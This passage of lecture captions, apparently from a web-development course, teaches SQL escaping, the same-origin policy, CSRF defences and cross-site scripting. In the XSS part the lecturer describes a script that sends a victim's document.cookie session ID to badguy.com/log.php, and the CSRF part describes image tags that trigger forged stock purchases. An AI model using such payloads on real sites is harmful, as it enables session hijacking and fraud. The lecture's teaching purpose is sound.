1654
01:11:01,956 --> 01:11:05,236
Oh, and to be clear in green
here this is what the bad guy

1655
01:11:05,236 --> 01:11:08,626
would experience if you actually
called mysql_real_escape_string.

1656
01:11:08,626 --> 01:11:12,406
Looks stupid but it's
no longer tricking you

1657
01:11:12,476 --> 01:11:15,826
into evaluating something
as 1equals1 expression.

1658
01:11:16,036 --> 01:11:19,996
Now it says give me the user ID
where the username is jharvard

1659
01:11:19,996 --> 01:11:26,286
and the password is literally
12345; OR and so forth.

1660
01:11:26,626 --> 01:11:28,126
Which is not likely
someone's password.

1661
01:11:28,566 --> 01:11:32,056
And even if it is it's probably
John Harvard who's trying

1662
01:11:32,056 --> 01:11:32,816
to log in with that.

1663
01:11:33,776 --> 01:11:34,146
All right.

1664
01:11:34,356 --> 01:11:37,466
So same-origin policy, and
its relation here to security.

1665
01:11:37,466 --> 01:11:41,646
So we talked briefly about
this on Monday in what context?

1666
01:11:42,256 --> 01:11:44,836
There's a same-origin policy
that, long story short,

1667
01:11:45,186 --> 01:11:48,636
essentially says what?

1668
01:11:49,206 --> 01:11:49,366
Axle?

1669
01:11:51,556 --> 01:11:54,456
>> Well, I encountered
it when I tried

1670
01:11:54,456 --> 01:11:55,846
to get some [inaudible]
data from the [inaudible].

1671
01:11:55,846 --> 01:12:00,606
They wouldn't allow me because
I wasn't on the same server.

1672
01:12:00,906 --> 01:12:01,656
>> Good.

1673
01:12:01,946 --> 01:12:04,636
>> So what I had to do --
well, you can go around it,

1674
01:12:05,006 --> 01:12:06,686
you can just do a PHP
[inaudible] contents

1675
01:12:06,846 --> 01:12:09,416
and then echo [inaudible] HTML,
but you would essentially,

1676
01:12:09,416 --> 01:12:12,336
the policy constitutes
that you have to be

1677
01:12:12,376 --> 01:12:16,266
on the same server
[inaudible] database.

1678
01:12:16,326 --> 01:12:16,746
>> Exactly.

1679
01:12:16,746 --> 01:12:18,246
Browser behavior is
governed generally

1680
01:12:18,246 --> 01:12:20,696
by the same origin policy
which is really relevant

1681
01:12:20,696 --> 01:12:23,006
for us most recently
by context of Ajax.

1682
01:12:23,326 --> 01:12:26,076
Which allows us of course to
get more data from a server

1683
01:12:26,076 --> 01:12:28,096
and incorporate it
into the existing DOM.

1684
01:12:28,436 --> 01:12:31,006
Problem is the same origin
policy tells browsers

1685
01:12:31,046 --> 01:12:34,506
that you can make Ajax
requests to other servers

1686
01:12:34,736 --> 01:12:39,066
but you cannot integrate their
response into the current DOM

1687
01:12:39,066 --> 01:12:42,616
because it's not from the same
origin as the original DOM,

1688
01:12:42,616 --> 01:12:44,646
the original HTML file
that was downloaded.

1689
01:12:44,936 --> 01:12:46,426
So there's a couple
workarounds for this.

1690
01:12:46,426 --> 01:12:49,326
One, the person who owns the
server, Yahoo in that case,

1691
01:12:49,616 --> 01:12:53,536
could start sending certain HTTP
headers, called cors headers,

1692
01:12:53,536 --> 01:12:57,176
C-O-R-S, that essentially
tell browsers it's okay

1693
01:12:57,176 --> 01:13:00,226
to let people incorporate our
data into their existing DOMs.

1694
01:13:00,546 --> 01:13:02,846
Most websites don't enable
that, and you can do it

1695
01:13:02,846 --> 01:13:04,306
if you run the server,
you can't do it

1696
01:13:04,306 --> 01:13:06,366
if obviously you're
trying to use Yahoo.

1697
01:13:06,676 --> 01:13:08,266
Alternatively you
can write a proxy,

1698
01:13:08,266 --> 01:13:10,366
a little PHP script that's
maybe one or two lines

1699
01:13:10,366 --> 01:13:12,616
that makes the request for
you, but that PHP script

1700
01:13:12,616 --> 01:13:14,056
at least lives in
the same origin

1701
01:13:14,406 --> 01:13:16,376
as your JavaScript file,
so that might help.

1702
01:13:16,556 --> 01:13:21,036
You can use a third party proxy
service like Yahoo's YQL service

1703
01:13:21,086 --> 01:13:24,136
that I mentioned last time,
which will allow you to go

1704
01:13:24,136 --> 01:13:27,456
to some other server and
sends it back to you in a way

1705
01:13:27,456 --> 01:13:28,876
that you can incorporate it back

1706
01:13:28,876 --> 01:13:30,476
into your own DOM,
which is nice.

1707
01:13:30,816 --> 01:13:34,456
Or you can use something called
JSONP, called padded JSON,

1708
01:13:34,766 --> 01:13:39,046
which essentially uses some
interesting script tag hacks

1709
01:13:39,506 --> 01:13:44,306
so that you can grab data from
a server and you tell the server

1710
01:13:44,306 --> 01:13:47,986
in advance what function
you want to be called

1711
01:13:48,666 --> 01:13:49,996
when the data comes back.

1712
01:13:50,376 --> 01:13:54,336
And if the server cooperates
then you can trick the server,

1713
01:13:54,336 --> 01:13:56,066
rather, it's not so much
a trick in that case.

1714
01:13:56,546 --> 01:14:01,086
You can incorporate data into
your DOM by using a server

1715
01:14:01,086 --> 01:14:03,646
that supports, again,
JSONP, padded JSON.

1716
01:14:03,646 --> 01:14:05,626
But many websites
don't support that;

1717
01:14:05,626 --> 01:14:08,346
they'll support just
JSON or XML, or the like.

1718
01:14:08,346 --> 01:14:09,866
So in short, number
of workarounds

1719
01:14:10,386 --> 01:14:12,276
but a pain nonetheless.

1720
01:14:12,926 --> 01:14:15,956
Oh, and this affects everything,
windows, frames, objects,

1721
01:14:16,256 --> 01:14:18,366
Ajax requests, and
it's the Ajax ones

1722
01:14:18,366 --> 01:14:20,566
that are the most
current for us.

1723
01:14:20,566 --> 01:14:22,486
All right, so a couple

1724
01:14:22,486 --> 01:14:24,456
of remaining attacks
to be mindful of.

1725
01:14:24,456 --> 01:14:26,076
Things that you might
not have even appreciated

1726
01:14:26,076 --> 01:14:28,376
as you've made your
HTML based websites

1727
01:14:28,376 --> 01:14:30,366
or more recently
your PHP websites,

1728
01:14:30,366 --> 01:14:32,126
or now your JavaScript
based websites.

1729
01:14:32,456 --> 01:14:34,026
Cross-Site Request Forgeries,

1730
01:14:34,406 --> 01:14:36,106
which has an acronym
I rarely remember,

1731
01:14:36,246 --> 01:14:39,166
and Cross-Site Scripting
attacks, XSS.

1732
01:14:39,436 --> 01:14:41,946
So what are the two and
what should you fear?

1733
01:14:41,946 --> 01:14:43,226
So here's the story here.

1734
01:14:44,016 --> 01:14:47,976
You log into something like
project2 and suppose it lives

1735
01:14:47,976 --> 01:14:49,576
in some domain name on a web.

1736
01:14:49,576 --> 01:14:51,606
So domain.tld, top level domain.

1737
01:14:52,166 --> 01:14:54,936
So you log into
project2.domain.tld.

1738
01:14:54,936 --> 01:14:58,146
You then visit a bad guy's
site and the bad guy has a link

1739
01:14:58,526 --> 01:15:01,896
to this URL here,
HTTP://projecet2.domain.

1740
01:15:02,026 --> 01:15:04,186
tld/by.php?

1741
01:15:04,256 --> 01:15:06,996
symbol=INFX.PK.

1742
01:15:08,116 --> 01:15:11,246
You unwittingly buy
the penny stock.

1743
01:15:11,466 --> 01:15:12,926
What's going on here?

1744
01:15:12,926 --> 01:15:17,676
So this is assuming something
like CS75 finance in this case,

1745
01:15:17,896 --> 01:15:20,596
although, actually, two would
have been the [inaudible].

1746
01:15:21,046 --> 01:15:23,286
So if it's project1, this
would have been something

1747
01:15:23,316 --> 01:15:28,656
like CS75 finance, and
it seems to be proposing

1748
01:15:28,656 --> 01:15:31,876
that this bad guy has a
link that just so happens

1749
01:15:31,926 --> 01:15:36,256
to be leading back to your
domain, but he has it there

1750
01:15:36,256 --> 01:15:37,686
because he just likes
tricking people

1751
01:15:37,686 --> 01:15:38,926
into buying his penny stock.

1752
01:15:39,216 --> 01:15:40,986
And that's advantageous
for him, the bad guy,

1753
01:15:40,986 --> 01:15:42,446
because the more people
that buy the penny stock,

1754
01:15:42,446 --> 01:15:44,456
the more it drives the price
up, then he can sell and screw

1755
01:15:44,456 --> 01:15:47,366
over all these people, so a
reasonable attack scenario.

1756
01:15:48,066 --> 01:15:51,626
So how is this working,
or what's the flaw

1757
01:15:51,626 --> 01:15:54,266
in your website,
project2.domain.tld?

1758
01:15:54,266 --> 01:15:54,406
Jack?

1759
01:15:55,516 --> 01:16:03,286
[ Inaudible Speaker ]

1760
01:16:03,786 --> 01:16:03,976
Good.

1761
01:16:04,516 --> 01:16:26,546
[ Inaudible Speaker ]

1762
01:16:27,046 --> 01:16:27,626
Perfect, right?

1763
01:16:27,626 --> 01:16:30,736
It's not that hard to figure
out how a website works;

1764
01:16:30,736 --> 01:16:32,316
you can just use
Chromes Inspector.

1765
01:16:32,316 --> 01:16:33,886
Anyone who's taken this
class, like, has --

1766
01:16:33,986 --> 01:16:36,216
is savvy with which to start
poking around, and just figure

1767
01:16:36,216 --> 01:16:38,766
out how almost every
mechanism of a website works,

1768
01:16:38,996 --> 01:16:41,246
unless things -- like,
JavaScript [inaudible]

1769
01:16:41,246 --> 01:16:42,436
which just makes it harder.

1770
01:16:42,686 --> 01:16:44,076
But at the end of the day
you can certainly figure

1771
01:16:44,076 --> 01:16:45,826
out what HTTP parameters
are being used

1772
01:16:45,826 --> 01:16:47,836
by just watching the
traffic in your own browser

1773
01:16:47,836 --> 01:16:48,926
or some other debugging tool.

1774
01:16:49,256 --> 01:16:51,476
And if you made the conscious
decision as the designer

1775
01:16:51,476 --> 01:16:54,046
of this website to
have a buy.thp file,

1776
01:16:54,046 --> 01:16:57,026
which that's reasonable, and it
takes a parameter called symbol,

1777
01:16:57,266 --> 01:16:59,686
and a stock symbol as its value,

1778
01:16:59,686 --> 01:17:00,966
and that buys one
share [inaudible]

1779
01:17:01,186 --> 01:17:02,536
or something like that.

1780
01:17:02,926 --> 01:17:05,156
Well, you have made
a mistake here

1781
01:17:05,156 --> 01:17:07,946
because you've made it
super easy for a user

1782
01:17:08,176 --> 01:17:10,666
to similarly construct a
URL that looks like this.

1783
01:17:10,666 --> 01:17:12,826
And the bad guy might not
even put it in his website,

1784
01:17:13,066 --> 01:17:16,036
what if he just sends a
million spams and tells people

1785
01:17:16,036 --> 01:17:18,366
in that spam email to
click this link, right?

1786
01:17:18,366 --> 01:17:19,716
He's going to get
some small percentage

1787
01:17:19,716 --> 01:17:22,906
of people actually clicking the
link, who if they also happen

1788
01:17:22,906 --> 01:17:25,956
to be users of your website,
have just been tricked

1789
01:17:25,956 --> 01:17:27,096
into buying that stock.

1790
01:17:27,256 --> 01:17:29,536
Now obviously this is kind of
a silly name for a website,

1791
01:17:29,536 --> 01:17:32,596
but what if the URL is actually
etrade.com, or something

1792
01:17:32,596 --> 01:17:34,736
like that, and you've
been logged in recently

1793
01:17:34,736 --> 01:17:37,346
to your E-Trade account and
they have implemented their

1794
01:17:37,466 --> 01:17:39,986
[inaudible] parameters in
this way, you can trick them

1795
01:17:39,986 --> 01:17:41,316
into buying the penny stock.

1796
01:17:41,766 --> 01:17:42,556
So what's a defense?

1797
01:17:42,556 --> 01:17:44,696
So Jack proposed,
like, a random number.

1798
01:17:44,696 --> 01:17:45,706
Can you elaborate, Jack?

1799
01:17:46,516 --> 01:17:57,686
[ Inaudible Speaker ]

1800
01:17:58,186 --> 01:17:58,416
Good.

1801
01:17:59,396 --> 01:18:01,396
[ Inaudible Speaker ]

1802
01:18:01,776 --> 01:18:05,446
Good. So you can have the web
server, etrade.com for instance,

1803
01:18:05,706 --> 01:18:07,806
generating some kind
of random token

1804
01:18:07,806 --> 01:18:12,456
that it requires be
in the actual buy.

1805
01:18:12,716 --> 01:18:15,816
And the motivation here is
that if the server uses cookies

1806
01:18:15,816 --> 01:18:19,596
or sessions to remember that
I gave Jack this random ID

1807
01:18:19,596 --> 01:18:22,786
for subsequent purchases,
now the bad guy has

1808
01:18:22,836 --> 01:18:25,586
to not only know the format
of the URL, he also has to get

1809
01:18:25,586 --> 01:18:28,676
so damn lucky as
to also hard code

1810
01:18:28,676 --> 01:18:32,006
into his link the same
identifier that Jack was handed.

1811
01:18:32,006 --> 01:18:33,056
And if the number
is long enough,

1812
01:18:33,056 --> 01:18:35,286
there's no way statistically
that's going to happen.

1813
01:18:35,286 --> 01:18:36,976
So that can help
ward off the threat.

1814
01:18:37,516 --> 01:18:45,736
[ Inaudible Speaker ]

1815
01:18:46,236 --> 01:18:46,906
Okay.

1816
01:18:47,516 --> 01:18:53,546
[ Inaudible Speaker ]

1817
01:18:54,046 --> 01:18:54,776
Ah, a really good thought.

1818
01:18:54,776 --> 01:18:56,396
So among the HTTP headers

1819
01:18:56,956 --> 01:19:01,326
that a browser typically sends
there's one called the referer

1820
01:19:01,536 --> 01:19:03,146
header, which specifies,

1821
01:19:03,536 --> 01:19:07,496
I came from this URL
recently, and this is useful.

1822
01:19:07,496 --> 01:19:09,356
This is how things like
Google Analytics figure

1823
01:19:09,356 --> 01:19:11,786
out where you're coming
from when you get to a page.

1824
01:19:11,786 --> 01:19:13,696
They can tell you that you came
from the Google, or the like.

1825
01:19:14,056 --> 01:19:17,706
But the catch with this
HTTP referer header is

1826
01:19:17,736 --> 01:19:19,256
that it's not guaranteed
to exist.

1827
01:19:19,556 --> 01:19:22,316
It's a nice feature that
most browsers honor,

1828
01:19:22,556 --> 01:19:24,406
but if you're one of
these paranoid types,

1829
01:19:24,406 --> 01:19:26,376
or you are behind
corporate firewall

1830
01:19:26,376 --> 01:19:27,996
that scrubs certain information,

1831
01:19:27,996 --> 01:19:31,636
the HTTP referer header is not
required for correct behavior

1832
01:19:31,636 --> 01:19:34,936
of a browser, so
privacy scraping tools --

1833
01:19:34,936 --> 01:19:37,536
privacy scrubbing tools
could remove it all together.

1834
01:19:37,876 --> 01:19:39,806
And it's just not always sent,

1835
01:19:39,896 --> 01:19:41,326
depending on how
you visited the URL

1836
01:19:41,326 --> 01:19:42,896
or you open a new
tab or the like.

1837
01:19:42,896 --> 01:19:45,306
So not bad, it raises
the bar a bit,

1838
01:19:45,856 --> 01:19:47,976
but it's not a sufficiently
reliable mechanism.

1839
01:19:47,976 --> 01:19:50,786
It's not going to keep your
purchases super secure.

1840
01:19:51,806 --> 01:19:55,206
So one problem, too, seems to
be we're using what method here

1841
01:19:55,756 --> 01:19:56,516
for the stock purchase?

1842
01:19:56,516 --> 01:19:56,696
Ben?

1843
01:19:56,696 --> 01:19:57,276
[ Inaudible Speaker ]

1844
01:19:57,276 --> 01:19:59,936
Okay, so what's an
obvious alternative, then?

1845
01:20:00,516 --> 01:20:07,546
[ Inaudible Speaker ]

1846
01:20:08,046 --> 01:20:08,386
Okay, good.

1847
01:20:08,386 --> 01:20:10,616
So if you use post
instead, you don't just have

1848
01:20:10,616 --> 01:20:12,656
to trick the user into clicking
the link, you have to trick them

1849
01:20:12,656 --> 01:20:16,676
into filling out a form,
at least clicking a button.

1850
01:20:16,676 --> 01:20:16,926
Axle?

1851
01:20:17,516 --> 01:20:29,936
[ Inaudible Speaker ]

1852
01:20:30,436 --> 01:20:30,946
Good.

1853
01:20:31,516 --> 01:20:33,986
[ Inaudible Speaker ]

1854
01:20:34,486 --> 01:20:35,776
Good. So that's the catch.

1855
01:20:35,776 --> 01:20:38,816
So this does raise the bar, and
you've just protected yourself

1856
01:20:38,816 --> 01:20:41,176
against the less
intelligent of adversaries.

1857
01:20:41,466 --> 01:20:44,276
But we saw the other day how
you can register event handlers

1858
01:20:44,276 --> 01:20:46,666
[inaudible] that
prevents form submission.

1859
01:20:46,906 --> 01:20:49,916
Turns out in JavaScript
there's a function called submit

1860
01:20:49,916 --> 01:20:53,446
that you can call to actually
submit a form via code.

1861
01:20:53,716 --> 01:20:54,756
So all you've done here, too,

1862
01:20:54,756 --> 01:20:56,156
is you've made it a
little harder for them.

1863
01:20:56,156 --> 01:20:58,306
You've tried -- now the
user has to fill out a --

1864
01:20:58,306 --> 01:21:00,636
has to submit a form
by clicking a button.

1865
01:21:01,006 --> 01:21:02,306
But, again, with JavaScript,

1866
01:21:02,306 --> 01:21:04,116
and almost everyone
has JavaScript enabled,

1867
01:21:04,116 --> 01:21:06,676
a user could visit a page, there
could be a hidden form there,

1868
01:21:06,906 --> 01:21:08,366
and they're tricked
into submitting it

1869
01:21:08,406 --> 01:21:10,496
because there's a JavaScript
function that just says,

1870
01:21:10,786 --> 01:21:14,056
when the dom is loaded, submit
this form automatically.

1871
01:21:14,056 --> 01:21:18,306
So it raises the bar, helps
maybe with emails a little bit,

1872
01:21:18,826 --> 01:21:21,576
but not all of the
possible attacks.

1873
01:21:21,956 --> 01:21:23,546
And in fact it's a
little scarier than this.

1874
01:21:23,596 --> 01:21:26,106
Even though I chose this
example of, like, a spam email

1875
01:21:26,236 --> 01:21:27,916
or the user visiting the URL,

1876
01:21:28,246 --> 01:21:30,006
take a look at these
other possible attacks.

1877
01:21:30,346 --> 01:21:34,126
Suppose you just happen to visit
a website that has an image

1878
01:21:34,126 --> 01:21:37,706
in it, a script tag, an
iframe, another JavaScript tag

1879
01:21:37,706 --> 01:21:41,166
with some code, you can trick
the user to visiting URL

1880
01:21:41,166 --> 01:21:43,266
in so many different
ways, right,

1881
01:21:43,306 --> 01:21:44,896
simply by including
an image tag,

1882
01:21:44,896 --> 01:21:46,166
that's maybe the simplest one.

1883
01:21:46,386 --> 01:21:47,926
And notice this is kind of weird

1884
01:21:48,076 --> 01:21:51,006
in that I'm saying the image
is the URL of the buy.php,

1885
01:21:51,006 --> 01:21:54,416
but it's not a big deal if
that doesn't actually return an

1886
01:21:54,416 --> 01:21:54,966
image, right?

1887
01:21:54,966 --> 01:21:57,076
It's going to return a broken
icon or something like that,

1888
01:21:57,076 --> 01:21:58,686
but who cares, I
just tricked the user

1889
01:21:58,686 --> 01:22:00,466
into buying the stock already.

1890
01:22:00,726 --> 01:22:04,126
So realize that you don't
even have to be overtly trying

1891
01:22:04,126 --> 01:22:06,606
to trick the user into clicking
a link, you can trick them

1892
01:22:06,606 --> 01:22:09,666
into sending an HTTP
request from their browser

1893
01:22:09,666 --> 01:22:13,026
or their mail client just
by hard coding the URL.

1894
01:22:13,186 --> 01:22:15,906
So now POST would help with
these attacks in particular,

1895
01:22:16,226 --> 01:22:19,646
but not in the case of a
browser supporting JavaScript.

1896
01:22:20,456 --> 01:22:24,696
So how can we really
fix this, then?

1897
01:22:24,906 --> 01:22:26,396
It's not sufficient
just to use POST.

1898
01:22:26,706 --> 01:22:29,186
I claim it's not sufficient
to rely on the referer header,

1899
01:22:29,186 --> 01:22:30,206
because it's not always there.

1900
01:22:30,206 --> 01:22:32,216
It might help, but
not sufficient.

1901
01:22:32,396 --> 01:22:34,376
POST doesn't seem to
do it fully for us.

1902
01:22:34,506 --> 01:22:36,766
The random numbers, not bad,
actually, that's probably one

1903
01:22:36,766 --> 01:22:38,416
of the most solid
solutions thus far

1904
01:22:38,416 --> 01:22:41,386
because it requires
server side cooperation.

1905
01:22:41,536 --> 01:22:41,866
Axle?

1906
01:22:42,516 --> 01:22:57,716
[ Inaudible Speaker ]

1907
01:22:58,216 --> 01:22:58,486
Okay.

1908
01:22:58,486 --> 01:22:59,206
[ Inaudible Speaker ]

1909
01:22:59,206 --> 01:22:59,976
Okay. Good.

1910
01:23:00,516 --> 01:23:05,396
[ Inaudible Speaker ]

1911
01:23:05,896 --> 01:23:06,286
Good.

1912
01:23:06,286 --> 01:23:06,396
[ Inaudible Speaker ]

1913
01:23:06,396 --> 01:23:09,816
Okay, so a slight
variant on Jack's idea.

1914
01:23:09,816 --> 01:23:11,156
This time you have
a hidden form field

1915
01:23:11,156 --> 01:23:13,426
that contains some
server generated token

1916
01:23:13,696 --> 01:23:16,786
that it can validate somehow
so that if it doesn't get

1917
01:23:16,786 --> 01:23:19,696
that same token, it knows
that this is a forged buy.

1918
01:23:20,236 --> 01:23:21,186
So that's not bad.

1919
01:23:21,186 --> 01:23:22,136
That, too, is solid.

1920
01:23:22,626 --> 01:23:25,886
What is -- if you've ever
bought something from Amazon,

1921
01:23:25,886 --> 01:23:32,866
what does Amazon ask you to
do before you buy something?

1922
01:23:33,486 --> 01:23:33,576
Yeah?

1923
01:23:34,516 --> 01:23:37,586
[ Inaudible Speaker ]

1924
01:23:38,086 --> 01:23:38,646
Okay, so CAPTCHA's.

1925
01:23:38,646 --> 01:23:38,976
What's a CAPTCHA?

1926
01:23:39,516 --> 01:23:45,636
[ Inaudible Speaker ]

1927
01:23:46,136 --> 01:23:47,856
Okay, but what does that mean?

1928
01:23:48,696 --> 01:23:50,826
>> It's a -- generally an image

1929
01:23:51,226 --> 01:23:54,306
that viewers having a
hard time figuring out.

1930
01:23:54,716 --> 01:23:56,386
It's distorted text --

1931
01:23:56,386 --> 01:23:56,946
>> Okay, good.

1932
01:23:56,996 --> 01:23:57,386
>> -- generally.

1933
01:23:57,626 --> 01:24:00,766
And for -- for [inaudible]
it's really hard

1934
01:24:00,856 --> 01:24:04,046
to see what it actually says,

1935
01:24:04,656 --> 01:24:06,636
but for you it's
really easy [inaudible].

1936
01:24:07,246 --> 01:24:12,336
So [inaudible] spend time
[inaudible] can't have

1937
01:24:12,676 --> 01:24:13,166
[inaudible] because [inaudible].

1938
01:24:13,166 --> 01:24:19,166
But [inaudible] buy stock,
it's going to go, okay,

1939
01:24:19,546 --> 01:24:23,476
[inaudible] five
letters and five numbers.

1940
01:24:23,566 --> 01:24:23,766
>> Perfect.

1941
01:24:24,096 --> 01:24:31,526
Yeah, and so you just --
you put a bump in the road,

1942
01:24:31,786 --> 01:24:36,266
so that even though the
user could be tricked

1943
01:24:36,266 --> 01:24:39,086
into visiting your webpage,
either behind the scenes

1944
01:24:39,086 --> 01:24:41,976
with a tag like these, the
image tag, or explicitly

1945
01:24:41,976 --> 01:24:44,476
by a link they click in
an email or in a website

1946
01:24:44,476 --> 01:24:45,966
that they visited or redirect.

1947
01:24:46,186 --> 01:24:49,396
Before the buy.php
actually buys the stock,

1948
01:24:49,616 --> 01:24:51,836
it shows the user a
CAPTCHA, a thing like,

1949
01:24:52,096 --> 01:24:54,316
please type in the
following word that you see,

1950
01:24:54,546 --> 01:24:57,996
just to raise the bar so
that the user now kind

1951
01:24:58,246 --> 01:25:00,256
of has to be not so sharp.

1952
01:25:00,416 --> 01:25:02,456
If they're like, okay,
I'll fill out this form,

1953
01:25:02,456 --> 01:25:05,096
even though that form says
to buy this stock fill

1954
01:25:05,096 --> 01:25:06,706
out this form, or
fill out this CAPTCHA.

1955
01:25:06,996 --> 01:25:08,446
And similarly we
could do something

1956
01:25:08,446 --> 01:25:11,306
like Amazon does itself,

1957
01:25:11,376 --> 01:25:12,826
they just prompt the
user to re-login.

1958
01:25:13,136 --> 01:25:15,116
So even if you're logged
into your Amazon account

1959
01:25:15,186 --> 01:25:17,216
and are browsing and
adding things to your cart,

1960
01:25:17,426 --> 01:25:20,576
the moment you click check
out, even if you just logged

1961
01:25:20,576 --> 01:25:23,296
in a minute ago, they
prompt you to login again,

1962
01:25:23,666 --> 01:25:27,026
putting that bump in the road so
that the user has to demonstrate

1963
01:25:27,286 --> 01:25:30,176
that it's indeed me and not some
bad guy that just tricked me

1964
01:25:30,176 --> 01:25:31,546
into visiting the checkout line.

1965
01:25:31,546 --> 01:25:33,786
And that's particularly
important for Amazon

1966
01:25:33,786 --> 01:25:36,576
because they have this
patented feature that does what?

1967
01:25:37,046 --> 01:25:40,866
One-click shopping.

1968
01:25:41,666 --> 01:25:43,026
All right, one-click,
kind of bad, right?

1969
01:25:43,026 --> 01:25:45,846
If you can buy a stock or
a buy a book or buy a TV

1970
01:25:45,846 --> 01:25:48,796
with one click, you better
be sure that it's the user

1971
01:25:48,796 --> 01:25:51,516
who has clicked and they
haven't been duped by one

1972
01:25:51,516 --> 01:25:53,536
of these various techniques.

1973
01:25:54,456 --> 01:25:55,936
And lastly, XSS.

1974
01:25:56,496 --> 01:25:58,676
So this one we've talked
about, but let's take a look

1975
01:25:58,676 --> 01:25:59,766
at a concrete example.

1976
01:25:59,766 --> 01:26:03,806
So this URL's unfortunately
a little long and small,

1977
01:26:03,806 --> 01:26:05,166
but demonstrates the idea.

1978
01:26:05,166 --> 01:26:06,196
So let me zoom in.

1979
01:26:06,656 --> 01:26:10,166
so supposed in this scenario
you happen to click on a link

1980
01:26:10,236 --> 01:26:14,216
that goes to vulnerable.com,
literally, and foo equals

1981
01:26:14,216 --> 01:26:15,856
and then some crazy
looking script tag.

1982
01:26:16,116 --> 01:26:18,396
Now, generally the script
tag would not be written

1983
01:26:18,396 --> 01:26:20,686
as a script tag, it would
be something cryptic looking

1984
01:26:20,686 --> 01:26:23,116
like this with percent
signs, because we call it PHP

1985
01:26:23,116 --> 01:26:25,466
and other languages and
have a URL and code function

1986
01:26:25,706 --> 01:26:28,236
that take potentially
dangerous characters and spaces

1987
01:26:28,236 --> 01:26:31,206
and they URL and code them
using percent signs and numbers

1988
01:26:31,586 --> 01:26:33,266
to make sure that
it's all one string,

1989
01:26:33,266 --> 01:26:35,126
with no spaces or
breakages in it.

1990
01:26:35,616 --> 01:26:37,146
But just so we can
talk about it,

1991
01:26:37,316 --> 01:26:39,576
the top is what the
bottom translates to.

1992
01:26:39,576 --> 01:26:40,966
But what does that do?

1993
01:26:41,136 --> 01:26:42,636
It's a script tag inside

1994
01:26:42,636 --> 01:26:45,046
of which is apparently
some JavaScript code,

1995
01:26:45,246 --> 01:26:47,616
and we didn't see
document.location the other day,

1996
01:26:47,616 --> 01:26:51,846
but document.location
is a property inside

1997
01:26:51,846 --> 01:26:54,476
of the document global
object in JavaScript

1998
01:26:54,756 --> 01:26:56,896
that if you assign
a new URL to it,

1999
01:26:57,476 --> 01:27:00,266
it redirects the
browser to that URL.

2000
01:27:00,266 --> 01:27:03,136
So we saw the redirect
ability of PHP

2001
01:27:03,136 --> 01:27:06,316
by sending the location
header, the [inaudible] header.

2002
01:27:06,466 --> 01:27:08,626
You can also redirect
users in JavaScript

2003
01:27:08,626 --> 01:27:12,866
by setting document.location
or document.location.atra,

2004
01:27:12,986 --> 01:27:15,736
more specifically, to another
URL and they'll be whisked away

2005
01:27:15,736 --> 01:27:17,156
as soon as the code executes.

2006
01:27:17,556 --> 01:27:20,416
But in this case the bad guy
is doing something clever,

2007
01:27:20,686 --> 01:27:24,136
he's sending the user to
badguy.com, for clarity,

2008
01:27:24,566 --> 01:27:26,856
/log.php, the idea
being that he's going

2009
01:27:26,856 --> 01:27:28,976
to log whatever he
gets of this file.

2010
01:27:29,276 --> 01:27:32,596
And the argument he's giving
himself is cookie equals the

2011
01:27:33,476 --> 01:27:35,276
[inaudible] of document.cookie.

2012
01:27:35,336 --> 01:27:37,636
We also didn't talk about
this, but it turns out that

2013
01:27:37,636 --> 01:27:40,636
in JavaScript you can also
access cookies; you can set them

2014
01:27:40,636 --> 01:27:42,636
and get them, and
they're all stored

2015
01:27:42,636 --> 01:27:44,606
in an object called
document.cookie.

2016
01:27:44,926 --> 01:27:47,246
So inside this global document
object there's another object

2017
01:27:47,246 --> 01:27:50,026
called cookie and
everything in there is --

2018
01:27:50,266 --> 01:27:52,036
all of the key value
pairs you have

2019
01:27:52,036 --> 01:27:55,116
for this website's
cookies are stored there.

2020
01:27:55,446 --> 01:27:56,666
So what's the implication?

2021
01:27:56,666 --> 01:27:58,436
If it's a PHP based
website you're visiting,

2022
01:27:58,716 --> 01:28:00,846
there's at least one cookie
involved [inaudible] sessions

2023
01:28:01,436 --> 01:28:02,856
and that cookie is called what?

2024
01:28:03,516 --> 01:28:07,546
[ Inaudible Speaker ]

2025
01:28:08,046 --> 01:28:10,136
A PHPSESSID, right?

2026
01:28:10,136 --> 01:28:12,786
That big capitalized word we
keep seeing in the headers.

2027
01:28:12,786 --> 01:28:17,236
So PHPSESSID is going to
be present in the memory

2028
01:28:17,236 --> 01:28:19,686
of any browser that's
visited a PHP website

2029
01:28:19,686 --> 01:28:22,216
that has session start
having been called,

2030
01:28:22,546 --> 01:28:23,646
where sessions are in use.

2031
01:28:23,996 --> 01:28:26,906
So that means in
document.cookie I have access

2032
01:28:26,906 --> 01:28:28,166
to a user's session cookie.

2033
01:28:28,476 --> 01:28:30,736
So what I'm doing here
is constructing a URL,

2034
01:28:30,736 --> 01:28:34,726
badguy.com/log.php cookie
equals document.cookie,

2035
01:28:35,066 --> 01:28:38,036
so that effectively the URL I'm
going to be sending the user

2036
01:28:38,036 --> 01:28:43,496
to is badguy.com/log.php?cookie
equals one, two, three, four,

2037
01:28:43,496 --> 01:28:44,106
five, six, seven, either,

2038
01:28:44,106 --> 01:28:46,106
whatever the big
random number is

2039
01:28:46,106 --> 01:28:48,046
that is the user's
PHP session ID.

2040
01:28:48,916 --> 01:28:49,986
So what does this mean?

2041
01:28:50,116 --> 01:28:52,476
This is a very sophisticated way

2042
01:28:52,606 --> 01:28:57,746
of sniffing someone's
session cookie, not via WiFi,

2043
01:28:57,746 --> 01:28:59,886
not via a wired Internet
connection.

2044
01:29:00,176 --> 01:29:02,136
In fact, it's doing
it via JavaScript.

2045
01:29:02,136 --> 01:29:03,776
So they could be
anywhere in the world.

2046
01:29:03,896 --> 01:29:05,746
They could be on an encrypted
connection, on a VPN,

2047
01:29:05,746 --> 01:29:10,256
they can have WPA2 installed,
but it doesn't matter

2048
01:29:10,256 --> 01:29:13,446
because JavaScript is as close
to the user as you can get.

2049
01:29:13,446 --> 01:29:15,226
The cookies are unencrypted
at that point,

2050
01:29:15,396 --> 01:29:17,276
they're stored inside
of this container

2051
01:29:17,276 --> 01:29:18,536
called document.cookie.

2052
01:29:18,796 --> 01:29:21,746
So if I trick the user into
executing some JavaScript code,

2053
01:29:21,936 --> 01:29:23,966
that JavaScript code doesn't
have to be something stupid,

2054
01:29:23,966 --> 01:29:26,806
like a few lectures ago where
I just said, alert hello,

2055
01:29:26,956 --> 01:29:29,586
or alert annoy, or
whatever it was, rather,

2056
01:29:29,586 --> 01:29:31,716
it can be something
dangerous like this.

2057
01:29:32,146 --> 01:29:35,976
Because now badguy.com has in
his log file somewhere, what?

2058
01:29:36,016 --> 01:29:38,016
[ Silence ]

2059
01:29:38,016 --> 01:29:40,000
[ Inaudible Speaker ]

2060
01:29:40,046 --> 01:29:41,246
